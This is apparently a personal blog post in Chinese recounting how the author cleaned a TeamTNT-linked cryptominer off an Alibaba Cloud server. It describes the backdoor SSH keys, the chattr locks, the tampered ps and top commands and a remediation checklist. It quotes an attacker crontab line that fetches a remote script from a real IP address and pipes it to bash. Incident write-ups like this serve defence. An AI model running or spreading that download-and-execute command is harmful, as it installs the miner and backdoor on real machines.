好多天没有连接上阿里云服务器,然后看了一下,好家伙,cpu占用全是99%,发生了肾么事
然后远程连接都连接不上,就直接在服务器上停止了,然后把防火墙都关掉。重新连接。
然后开始处理,找了一些相关的博客看了一下。
首先.ssh中多了两个秘钥,rm掉,但表示没有权限。被人用chattr锁上了,进而编译下载chattr去除,然后删掉
chattr -ai 用户多了个lsb用户,同样方法删掉
用top和ps -ef 指令看了一下,发现没什么高占用程序,只有sendmail占用高,应该是我把端口都禁用掉的原因。
crontab -l 中有定时任务
*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/s3f1015/a/a.sh | bash > /dev/null 2>&1
删除crontab定时任务,其中用-e没有权限,etc 和另一个文件夹都被修改了chattr
crontab -l #查看
crontabl -e #编辑删除
其中因为权限问题,还需要修改另一个文件夹,忘了
想想自己不用sendmail,直接删掉
whereis sendmail
rm -rf /usr/bin/sendmail
kill -9 [pid]last中没有看到异常的用户,应该是把记录都清除掉了
删除对应的一些挖矿进程,或直接重启,查看启动项等
然后我以为就结束了,好奇看下那个网址下的脚本是啥,行吧
ps、top、pstree命令都被修改过了,过滤掉了挖矿程序
把这些命令反操作复原一下
脚本中主要是做了,准备wget、chattr程序,改造ps、top、pstree隐藏挖矿程序,制作.ssh秘钥留后门,删除其他的挖矿程序(高于65%cpu占用),清除痕迹,还有一段用bash64编码的程序,然后运行挖矿程序
最终挖矿程序也是网址上的httpd脚本
其中的注释中提到teamTNT。
因为之前直接将阿里云防火墙全部端口打开了,所以没法推测是redis漏洞还是docker漏洞侵入的,建议最好只打开需要用到的端口
在docker中,多了个docker镜像,在公共仓库上有10k下载了,猜测这个就是侵入镜像,那么还是有挺多人中招的
这么一套下来,虽然费了些时间,而且确实不明确还有没有彻底清理掉。但是其中也对linux更熟悉了一些,还挺有意思的
目前对于攻击流程还不明确,也稍微有点遗憾
但下次遇到病毒,总结下来处理流程是
1. 清除.ssh里的后门
2. 清除定时任务
3. 杀死可疑的进程和删掉可疑的程序
4. 查看重要的命令是有有被修改,有的话进行修复
5. 查找被攻击的缘由
当然,如果服务器没有重要的数据,直接重装最快乐。
参考链接:
记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案_董哥的黑板报-CSDN博客
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
